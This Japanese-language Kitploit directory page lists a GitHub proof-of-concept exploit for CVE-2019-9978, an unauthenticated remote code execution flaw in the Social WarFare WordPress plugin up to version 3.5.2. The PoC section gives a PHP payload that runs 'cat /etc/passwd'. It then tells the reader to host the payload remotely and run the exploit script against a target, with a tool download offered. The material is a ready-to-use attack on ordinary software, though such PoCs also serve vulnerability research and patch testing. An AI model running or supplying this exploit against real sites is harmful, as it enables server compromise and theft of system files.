Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-9978 — CVE-2019-9978 - (PoC) Social WarFare Plugin (<=3.5.2) におけるRCE | Kitploit
ツール/GitHubGitHub/hash3lizer/cve-2019-9978
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubhash3lizer/cve-2019-9978

CVE-2019-9978

CVE-2019-9978 - (PoC) Social WarFare Plugin (<=3.5.2) におけるRCE

リポジトリを見る
2287年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-9978

CVE-2019-9978 - Social WarFare プラグイン (<=3.5.2) における (PoC) RCE

説明

設定のインポートを処理する機能において、認証されていないリモートコード実行が発見されました。ユーザーは RFI を利用して RCE を実行できます。

PoC

以下のペイロードをコピーします:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

payload.txt というファイル名で保存し、サーバーにアップロードします。URI は http(s)://yoursite.com/payload.txt のようになります。最後に、--target と --payload-uri オプションを指定します:

root@kitploit:~
$ python cve-2019-9978.py --target http://vulntarget.com \
                         --payload-uri http://yourpayloadsite.com/payload.txt

Screenshot at 2019-05-03 11-15-02

クレジット

研究者: Luka Sikic
リンク: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
作者: @hash3liZer

ツールをダウンロード